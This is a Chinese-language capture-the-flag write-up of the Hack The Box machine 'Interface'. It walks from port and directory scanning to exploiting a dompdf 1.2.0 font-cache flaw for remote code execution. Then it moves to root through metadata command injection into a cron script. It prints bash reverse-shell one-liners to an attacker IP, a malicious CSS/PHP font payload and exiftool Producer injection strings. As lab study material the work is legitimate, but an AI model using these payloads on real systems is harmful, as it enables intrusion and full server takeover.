01
信息收集
1.1. 端口嗅探
使用Nmap对靶机地址进行端口扫描发现靶机开放22,80端口。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ sudo nmap -sT --min-rate 10000 -p- 10.129.228.208[sudo] password for kali:Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-19 22:50 EDTWarning: 10.129.228.208 giving up on port because retransmission cap hit (10).Nmap scan report for 10.129.228.208Host is up (0.35s latency).Not shown: 56065 closed tcp ports (conn-refused), 9468 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp open ssh80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 102.01 seconds
继续使用-A -T4参数进行深度扫描22,80端口,获取到以下信息。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ sudo nmap -A -T4 10.129.228.208 -p 22,80[sudo] password for kali:Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-19 22:51 EDTWARNING: RST from 10.129.228.208 port 22 -- is this port really open?Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 93.75% done; ETC: 22:51 (0:00:00 remaining)Nmap scan report for 10.129.228.208Host is up (0.35s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)| 256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)|_ 256 cc62905560a658629e6b80105c799b55 (ED25519)80/tcp open http nginx 1.14.0 (Ubuntu)|_http-server-header: nginx/1.14.0 (Ubuntu)|_http-title: Site MaintenanceWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 5.0 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.0 - 5.3 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT ADDRESS1 349.06 ms 10.10.14.12 349.23 ms 10.129.228.208OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds
1.2. Web服务
访问http://10.129.228.208/页面,网站返回We’ll be back soon!信息,未发现其他功能页面。通过Wappalyzer插件可以发现Web服务使用到了Next.js、React、Node.js、Webpack等组件。
获取到Web服务站点响应包内容如下。
HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sat, 20 May 2023 02:54:14 GMTContent-Type: text/html; charset=utf-8Connection: closeContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;X-Powered-By: Next.jsETag: "i8ubiadkff4wf"Vary: Accept-EncodingContent-Length: 6359
在响应包中Content-Security-Policy字段中发现http://prd.m.rendering-api.interface.htb网址,同样在网站源代码中发现mailto:[email protected]。
<ahref="mailto:[email protected]"class="jsx-b59cd6f65990400b">
next.js属于React框架,经信息收集未发现next.js 13.0.4存在版本漏洞。
https://security.snyk.io/package/npm/next/versions?page=3使用dirsearch工具对Web站点进行目录扫描,由于返回大量308状态码信息,使用-x 308参数进行过滤,未发现有价值的目录信息。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ dirsearch -u http://10.129.228.208/ -x 308_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/kali/.dirsearch/reports/10.129.228.208/-_23-05-19_23-12-12.txtError Log: /home/kali/.dirsearch/logs/errors-23-05-19_23-12-12.logTarget: http://10.129.228.208/[23:12:14] Starting:[23:13:54] 200 - 15KB - /favicon.icoTask Completed
1.3. prd.m.rendering-api.interface.htb
将prd.m.rendering-api.interface.htb和interface.htb添加至/etc/hosts文件中。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ cat /etc/hosts127.0.0.1 localhost127.0.1.1 kali# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters# Interface10.129.228.208 prd.m.rendering-api.interface.htb10.128.228.208 interface.htb
访问http://prd.m.rendering-api.interface.htb/,页面返回File not found.信息。
HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 20 May 2023 03:36:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeContent-Length: 16File not found.
使用feroxbuster进行对http://prd.m.rendering-api.interface.htb/进行目录扫描,扫描器在Auto-filtering found 404-like response and created new filter自动过滤掉大量相同响应的404包后,返回http://prd.m.rendering-api.interface.htb/api的404包。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/___ ___ __ __ __ __ __ ___|__ |__ |__) |__) | / ` / \ \_/ | | \ |__| |___ | \ | \ | \__, \__/ / \ | |__/ |___by Ben "epi" Risher 🤓 ver: 2.9.1───────────────────────────┬──────────────────────🎯 Target Url │ http://prd.m.rendering-api.interface.htb/🚀 Threads │ 50📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt👌 Status Codes │ All Status Codes!💥 Timeout (secs) │ 7🦡 User-Agent │ feroxbuster/2.9.1💉 Config File │ /etc/feroxbuster/ferox-config.toml🏁 HTTP methods │ [GET]🔃 Recursion Depth │ 4🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/404 GET 1l 3w 50c http://prd.m.rendering-api.interface.htb/api403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor[####################] - 3m 30000/30000 0s found:3 errors:0[####################] - 3m 30000/30000 128/s http://prd.m.rendering-api.interface.htb/
这里返回了/api和/vendor两个目录,我们可以对这两个目录进行逐一分析。
1.3.1. /api
使用curl工具查看http://prd.m.rendering-api.interface.htb/api响应,返回"route not defined"信息,断定该地址为API接口地址。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -v http://prd.m.rendering-api.interface.htb/api* Trying 10.129.228.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)> GET /api HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*>< HTTP/1.1 404 Not Found< Server: nginx/1.14.0 (Ubuntu)< Date: Sat, 20 May 2023 04:05:25 GMT< Content-Type: application/json< Transfer-Encoding: chunked< Connection: keep-alive<* Connection #0 to host prd.m.rendering-api.interface.htb left intact{"status":"404","status_text":"route not defined"}
使用feroxbuster对api进行目录扫描,指定字典为seclists字典集中的raft-large-words.txt,使用-m GET,POST指定通过GET和POST两种模式进行扫描,因为常见API接口经常会用到GET和POST两种方式。在扫描结果中发现了/html2pdf目录。
└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/api/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST___ ___ __ __ __ __ __ ___|__ |__ |__) |__) | / ` / \ \_/ | | \ |__| |___ | \ | \ | \__, \__/ / \ | |__/ |___by Ben "epi" Risher 🤓 ver: 2.9.1───────────────────────────┬──────────────────────🎯 Target Url │ http://prd.m.rendering-api.interface.htb/api/🚀 Threads │ 50📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt👌 Status Codes │ All Status Codes!💥 Timeout (secs) │ 7🦡 User-Agent │ feroxbuster/2.9.1💉 Config File │ /etc/feroxbuster/ferox-config.toml🏁 HTTP methods │ [GET, POST]🔃 Recursion Depth │ 4🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404 GET 1l 3w 50c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404 POST 1l 3w 50c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter422 POST 1l 2w 36c http://prd.m.rendering-api.interface.htb/api/html2pdf[####################] - 35m 239202/239202 0s found:1 errors:46[####################] - 35m 239202/239202 112/s http://prd.m.rendering-api.interface.htb/api/
使用curl工具通过POST方式请求/api/html2pdf,页面返回{"status_text":"missing parameters"},即在使用POST请求时存在参数缺失。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -X POST http://prd.m.rendering-api.interface.htb/api/html2pdf{"status_text":"missing parameters"}
这时可以通过构造缺失的参数体进行请求,这也是API攻击典型的方式。从上面可以看到返回的信息为JSON格式,所以我们可以尝试构造JSON格式的参数'{"abc":"abc"}'。观察/api/html2pdf,根据习惯可以猜测html2pdf为API功能,且此功能为HTML向PDF转换。所以最终构造成的参数为{"html":"abc"}。使用curl -X -d命令进行请求,因为返回的二进制数据,可以使用--output -来获取返回信息。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -v -X POST http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"html":"abc"}' --output -Note: Unnecessary use of -X or --request, POST is already inferred.* Trying 10.129.228.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)> POST /api/html2pdf HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*> Content-Length: 34> Content-Type: application/x-www-form-urlencoded>< HTTP/1.1 200 OK< Server: nginx/1.14.0 (Ubuntu)< Date: Sat, 20 May 2023 06:21:07 GMT< Content-Type: application/pdf< Content-Length: 1130< Connection: keep-alive< X-Local-Cache: hit< Cache-Control: public< Content-Transfer-Encoding: Binary< Content-Disposition: attachment; filename=export.pdf<%PDF-1.71 0 obj<< /Type /Catalog/Outlines 2 0 R/Pages 3 0 R >>endobj2 0 obj<< /Type /Outlines /Count 0 >>endobj3 0 obj<< /Type /Pages/Kids [6 0 R]/Count 1/Resources <</ProcSet 4 0 R/Font <</F1 8 0 R>>>>/MediaBox [0.000 0.000 419.530 595.280]>>endobj4 0 obj[/PDF /Text ]endobj5 0 obj<</Producer (��dompdf 1.2.0 + CPDF)/CreationDate (D:20230520062044+00'00')/ModDate (D:20230520062044+00'00')>>endobj6 0 obj<< /Type /Page/MediaBox [0.000 0.000 419.530 595.280]/Parent 3 0 R/Contents 7 0 R>>endobj7 0 obj<< /Filter /FlateDecode/Length 66 >>streamx��2�[email protected]&�ҹ�B�M��L���,L-BR����B��5��5cB�\C݆�endstreamendobj8 0 obj<< /Type /Font/Subtype /Type1/Name /F1/BaseFont /Times-Roman/Encoding /WinAnsiEncoding>>endobjxref0 90000000000 65535 f0000000009 00000 n0000000074 00000 n0000000120 00000 n0000000274 00000 n0000000303 00000 n0000000452 00000 n0000000555 00000 n0000000692 00000 ntrailer<</Size 9/Root 1 0 R/Info 5 0 R/ID[]>>startxref801%%EOF* Connection #0 to host prd.m.rendering-api.interface.htb left intact
发送构造的请求,成果返回了数据。在响应包中发现我们输入的HTML被转换成了PDF格式Content-Disposition: attachment; filename=export.pdf,生成PDF用到了dompdf 1.2.0组件。
1.3.2. /vendor
使用curl工具查看http://prd.m.rendering-api.interface.htb/vendor响应,返回403 Forbidden信息。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -v http://prd.m.rendering-api.interface.htb/vendor* Trying 10.129.228.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)> GET /vendor HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*>< HTTP/1.1 403 Forbidden< Server: nginx/1.14.0 (Ubuntu)< Date: Sat, 20 May 2023 04:04:48 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< Connection: keep-alive<Access denied.* Connection #0 to host prd.m.rendering-api.interface.htb left intact
使用feroxbuster对vendor目录进行目录扫描,这里使用seclists字典集中的raft-large-words.txt。扫描结束后发现dompdf和composer目录,状态码为403。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt___ ___ __ __ __ __ __ ___|__ |__ |__) |__) | / ` / \ \_/ | | \ |__| |___ | \ | \ | \__, \__/ / \ | |__/ |___by Ben "epi" Risher 🤓 ver: 2.9.1───────────────────────────┬──────────────────────🎯 Target Url │ http://prd.m.rendering-api.interface.htb/vendor/🚀 Threads │ 50📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt👌 Status Codes │ All Status Codes!💥 Timeout (secs) │ 7🦡 User-Agent │ feroxbuster/2.9.1💉 Config File │ /etc/feroxbuster/ferox-config.toml🏁 HTTP methods │ [GET]🔃 Recursion Depth │ 4🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/vendor/403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/composer[####################] - 16m 119601/119601 0s found:3 errors:201[####################] - 16m 119601/119601 119/s http://prd.m.rendering-api.interface.htb/vendor/
使用feroxbuster对vendor/dompdf/目录进行目录扫描,这里使用seclists字典集中的raft-large-words.txt。扫描结束后发现/vendor/dompdf/dompdf目录,状态码为403。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt___ ___ __ __ __ __ __ ___|__ |__ |__) |__) | / ` / \ \_/ | | \ |__| |___ | \ | \ | \__, \__/ / \ | |__/ |___by Ben "epi" Risher 🤓 ver: 2.9.1───────────────────────────┬──────────────────────🎯 Target Url │ http://prd.m.rendering-api.interface.htb/vendor/dompdf/🚀 Threads │ 50📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt👌 Status Codes │ All Status Codes!💥 Timeout (secs) │ 7🦡 User-Agent │ feroxbuster/2.9.1💉 Config File │ /etc/feroxbuster/ferox-config.toml🏁 HTTP methods │ [GET]🔃 Recursion Depth │ 4🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/vendor/dompdf/403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf[####################] - 18m 119601/119601 0s found:2 errors:153[####################] - 18m 119601/119601 109/s http://prd.m.rendering-api.interface.htb/vendor/dompdf/
继续使用feroxbuster对/vendor/dompdf/dompdf/目录进行目录扫描,发现以下信息。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt___ ___ __ __ __ __ __ ___|__ |__ |__) |__) | / ` / \ \_/ | | \ |__| |___ | \ | \ | \__, \__/ / \ | |__/ |___by Ben "epi" Risher 🤓 ver: 2.9.1───────────────────────────┬──────────────────────🎯 Target Url │ http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/🚀 Threads │ 50📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt👌 Status Codes │ All Status Codes!💥 Timeout (secs) │ 7🦡 User-Agent │ feroxbuster/2.9.1💉 Config File │ /etc/feroxbuster/ferox-config.toml🏁 HTTP methods │ [GET]🔃 Recursion Depth │ 4🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/tests403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/VERSION403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.git403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.gitignore[####################] - 16m 119601/119601 0s found:7 errors:1[####################] - 16m 119601/119601 117/s http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/
1.4. 子域名枚举
使用wfuzz进行子域名枚举,未发现存在其他子域名信息。
┌──(kali㉿kali)-[~/Desktop/Interface]└─$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hl 1 -H "Host: FUZZ.interface.htb" http://10.129.228.208//usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer *********************************************************Target: http://10.129.228.208/Total requests: 4989=====================================================================ID Response Lines Word Chars Payload=====================================================================Total time: 0Processed Requests: 4989Filtered Requests: 4989Requests/sec.: 0
02
获取www-data权限
在/api/html2pdf接口在对HTML到PDF转换时,用到了dompdf 1.2.0的组件。经过信息收集,发现该组件存在远程命令执行的漏洞CVE-2022-28368和CVE-2022-41343。
2.1. CVE-2022-28368
通过信息收集,找到以下文章帮助我们进行漏洞利用。
# 漏洞利用原理https://positive.security/blog/dompdf-rcehttps://exploit-notes.hdks.org/exploit/web/dompdf-rce/# 漏洞利用工具https://github.com/positive-security/dompdf-rce
将dompdf-rce漏洞利用工具下载至本地。查看exploit.css内容如下,指向exploit_font.php为漏洞利用脚本。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ cat exploit.css@font-face {font-family:'exploitfont';src:url('http://10.10.14.2:9001/exploit_font.php');font-weight:'normal';font-style:'normal';}
在exploit_font.php末尾插入PHP反弹shell的脚本。& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ cat exploit_font.php� dum1�cmap`�,glyf5sc��head�Q6�6hhea��($hmtxDlocaTmaxp\ nameD�|8dum2�-��-����:83#5:08��_<�@�8�&۽:8L��:D6 s<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>
使用python3开启Web服务,服务端口为9001。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ python3 -m http.server 9001Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
在Burpsuite中Repeater模块中,将html参数值设为,触发漏洞执行。
POST /api/html2pdf HTTP/1.1Host: prd.m.rendering-api.interface.htbUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 74{"html":"<link rel=stylesheet href='http://10.10.14.2:9001/exploit.css'>"
此时存有反弹shell的exploit_font.php就被上传至了/dompdf/lib/fonts/__.php,因为和在中已声明,所以我们只要计算出http://10.10.14.2:9001/exploit_font.php的MD5,即可找到文件上传路径。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ echo -n 'http://10.10.14.2:9001/exploit_font.php' | md5sumd71339beac9da6cde233001997c94731 -
使用nc监听4444端口,并使用curl工具触发PHP反弹shell。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ curl -v http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_d71339beac9da6cde233001997c94731.php --output -* Trying 10.129.72.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.72.208) port 80 (#0)> GET /vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_d71339beac9da6cde233001997c94731.php HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*>
此时在nc已经接收到了shell,获取到了靶机的www-data权限。
┌──(kali㉿kali)-[~]└─$ nc -lvp 4444listening on [any] 4444 ...connect to [10.10.14.2] from prd.m.rendering-api.interface.htb [10.129.72.208] 34890bash: cannot set terminal process group (1390): Inappropriate ioctl for devicebash: no job control in this shell[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$
2.2. CVE-2022-41343
使用cve-2022-41343漏洞利用工具同样可以获取shell,利用方式同2.1 CVE-2022-28368,但是该工具会更加的自动化。https://github.com/BKreisel/CVE-2022-41343
┌──(kali㉿kali)-[~/.local/bin]└─$ ./cve-2022-41343 10.10.14.2 4445░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░░░██╗██╗░░███╗░░██████╗░░░██╗██╗██████╗░██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░░██╔╝██║░████║░░╚════██╗░██╔╝██║╚════██╗██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗██╔╝░██║██╔██║░░░█████╔╝██╔╝░██║░█████╔╝██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝███████║╚═╝██║░░░╚═══██╗███████║░╚═══██╗╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░╚════██║███████╗██████╔╝╚════██║██████╔╝░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░░░░░░╚═╝╚══════╝╚═════╝░░░░░░╚═╝╚═════╝░PoC for CVE-2022-41343 - dompdf Version < 2.0.1[*] CSS Payload...@font-face {font-family:'comicsploitz';src:url('http://10.10.14.2:55555/comicsploitz.php');font-weight:'normal';font-style:'normal';}[*] TTF Payload :+ /dev/tcp/10.10.14.2/4445 0<&5 1>&5 2>&5'")?>[*] CSS Link :[*] Listener : nc -nvlp 4445[*] Web Path : dompdf/dompdf/lib/fonts/comicsploitz_normal_a90483d8757c5671db94a1660e630450.php[*] Server Started on 55555 (Ctrl+C to stop)[+] Got Stage 1 Request. Sent CSS Payload 📎[+] Got Stage 2 Request. Sent TTF Payload 🏴☠️
在/home/dev目录下找到user.txt。
[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$ cd /home[email protected]:/home$ lsdev[email protected]:/home$ cd dev[email protected]:/home/dev$ lsuser.txt[email protected]:/home/dev$ cat user.txtae8491d99db6335782a2323136cd4e6e[email protected]:/home/dev$
03
获取root权限
使用sudo -l查看www-data可以使用root权限执行的文件,提示需要输入密码,无法通过sudo -l进行提权。
www-da[email protected]:/home/dev$ sudo -l[sudo] password for www-data:Sorry, try again.
使用pspy64分析进程,发现~/api/vendor/dompdf/dompdf/lib目录下可写,将pspy64上传至靶机并给予执行权限。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ ls -latotal 236drwxr-xr-x 5 www-data www-data 4096 Nov 20 21:59 .drwxr-xr-x 6 www-data www-data 4096 Jan 16 09:49 ..-rw-r--r-- 1 www-data www-data 221151 Nov 20 21:59 Cpdf.phpdrwxr-xr-x 2 www-data www-data 4096 May 20 09:25 fontsdrwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 html5libdrwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 res<ndor/dompdf/dompdf/lib$ wget http://10.10.14.2:9001/pspy64--2023-05-20 09:28:58-- http://10.10.14.2:9001/pspy64Connecting to 10.10.14.2:9001... connected.HTTP request sent, awaiting response... 200 OKLength: 3104768 (3.0M) [application/octet-stream]Saving to: 'pspy64'pspy64 100%[===================>] 2.96M 956KB/s in 3.2s2023-05-20 09:29:02 (956 KB/s) - 'pspy64' saved [3104768/3104768][email protected]:~/api/vendor/dompdf/dompdf/lib$ ls -latotal 3268drwxr-xr-x 5 www-data www-data 4096 May 20 09:28 .drwxr-xr-x 6 www-data www-data 4096 Jan 16 09:49 ..-rw-r--r-- 1 www-data www-data 221151 Nov 20 21:59 Cpdf.phpdrwxr-xr-x 2 www-data www-data 4096 May 20 09:25 fontsdrwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 html5lib-rw-r--r-- 1 www-data www-data 3104768 May 20 09:24 pspy64drwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 res[email protected]:~/api/vendor/dompdf/dompdf/lib$ chmod +x pspy64
运行pspy64。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ ./pspy64pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d██▓███ ██████ ██▓███ ▓██ ██▓▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░░░ ░ ░ ░ ░░ ▒ ▒ ░░░ ░ ░░ ░Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)Draining file system events due to startup...done...2023/05/20 09:34:01 CMD: UID=0 PID=3225 | /usr/sbin/CRON -f2023/05/20 09:34:01 CMD: UID=0 PID=3224 | /usr/sbin/CRON -f2023/05/20 09:34:01 CMD: UID=0 PID=3226 | /bin/bash /usr/local/sbin/cleancache.sh...2023/05/20 09:39:01 CMD: UID=0 PID=3372 | /bin/bash /usr/local/sbin/cleancache.sh2023/05/20 09:39:01 CMD: UID=0 PID=3371 | /bin/sh -c /usr/local/sbin/cleancache.sh2023/05/20 09:39:01 CMD: UID=0 PID=3370 | /usr/sbin/CRON -f
可以看到cleancache.sh脚本是在使用exiftool工具检查/tmp/目录下文件的Producer是否为dompdf,如果不是则删除文件。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ cat /usr/local/sbin/cleancache.sh#! /bin/bashcache_directory="/tmp"for cfile in "$cache_directory"/*; doif [[ -f "$cfile" ]]; thenmeta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)if [[ "$meta_producer" -eq "dompdf" ]]; thenecho "Removing $cfile"rm "$cfile"fifidone
这里用到了if [[ "$meta_producer" -eq "dompdf" ]]语句,可以通过控制$meta_producer参数的输入达到命令执行的目的。https://www.vidarholen.net/contents/blog/?p=716
通过创建test文件,使用exiftool更改文件的创建者,在里面插入whoami命令,手动执行cleancache.sh执行,发现命令成功执行返回www-data。
[email protected]:/tmp$ touch test[email protected]:/tmp$ exiftool -Producer='a[$(whoami>&2)]' test1 image files updated[email protected]:/tmp$ /usr/local/sbin/cleancache.shwww-dataSat May 20 10:23:34 UTC 2023[email protected]:/tmp$
可以将可控的参数改为反弹shell,通过定时任务root权限执行获得root权限的shell。在可写目录~/api/vendor/dompdf/dompdf/lib文件夹下创建反弹shell文件reverse_shell.sh,并增加执行权限。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ cat reverse_shell.sh#!/bin/bashbash -c 'bash -i >& /dev/tcp/10.10.14.2/6666 0>&1'[email protected]:~/api/vendor/dompdf/dompdf/lib$ chmod +x reverse_shell.sh
在/tmp文件夹下创建test文件,更改创建者为执行反弹shell脚本的语句exiftool -Producer='a[$(/var/www/api/vendor/dompdf/dompdf/lib/reverse_shell.sh>&2)]+42' test,使用nc开启6666端口的监听。
[email protected]:/tmp$ touch test[email protected]:/tmp$ exiftool -Producer='a[$(/var/www/api/vendor/dompdf/dompdf/lib/reverse_shell.sh>&2)]+42' test1 image files updated
等待定时计划执行,在nc成功接收到root权限的shell,并获取到root.txt。
